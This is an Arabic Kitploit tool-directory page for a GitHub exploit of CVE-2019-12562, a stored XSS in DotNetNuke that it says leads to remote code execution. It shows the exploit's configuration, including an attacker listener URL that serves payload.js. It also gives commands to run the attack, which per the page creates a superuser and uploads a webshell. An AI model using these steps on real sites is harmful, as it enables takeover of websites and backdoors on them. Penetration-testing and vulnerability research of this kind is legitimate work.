Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-12562 — ثغرة XSS مخزّنة في DotNetNuke (DNN) قبل الإصدار 9.4.0 | من XSS إلى RCE | Kitploit
أدوات/GitHubGitHub/mayaseven/cve-2019-12562
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubmayaseven/cve-2019-12562

CVE-2019-12562

ثغرة XSS مخزّنة في DotNetNuke (DNN) قبل الإصدار 9.4.0 | من XSS إلى RCE

عرض المستودع
84منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-12562

CVE-2019-12562 تسمح البرمجة النصية العابرة للمواقع المخزّنة (Stored Cross-Site Scripting) في DotNetNuke (DNN) الإصدارات قبل 9.4.0 للمهاجمين عن بُعد بتخزين البرنامج النصي الخبيث ودمجه في صفحة إشعارات المسؤول. يمكن استخدام هذا الاستغلال لتنفيذ أي إجراء بصلاحيات المسؤول مثل إدارة المحتوى، إضافة المستخدمين، رفع البوابات الخلفية (backdoors) إلى الخادم، وغير ذلك. يحدث الاستغلال الناجح عندما يزور مستخدم مسؤول صفحة إشعارات تحتوي على برمجة نصية عابرة للمواقع مخزّنة.

الاستغلال

  • قم بتكوين ملف الاستغلال
root@kitploit:~
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN"   # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
  • قم بتشغيل الاستغلال إذا كان الهدف معرضًا للخطر، فسيقوم الاستغلال بتسجيل مستخدم وهمي مع XSS مرفق في حقل "Display Name" وستحصل على payload.js.
root@kitploit:~
python3 CVE-2019-12562.py
  • يجب عليك تشغيل خادم ويب ووضع payload.js عليه لانتظار اتصال المسؤول.
root@kitploit:~
python -m SimpleHTTPServer 1337

سيقوم هذا الاستغلال بإنشاء مستخدم خارق (superuser) ورفع ويب شيل (webshell) إلى الخادم الهدف

شرط الاستغلال: يحدث الاستغلال الناجح عندما يزور مستخدم مسؤول صفحة إشعارات.

اقرأ المزيد: https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ مرجع CVE: https://www.cvedetails.com/cve/CVE-2019-12562/

تنزيل الأداة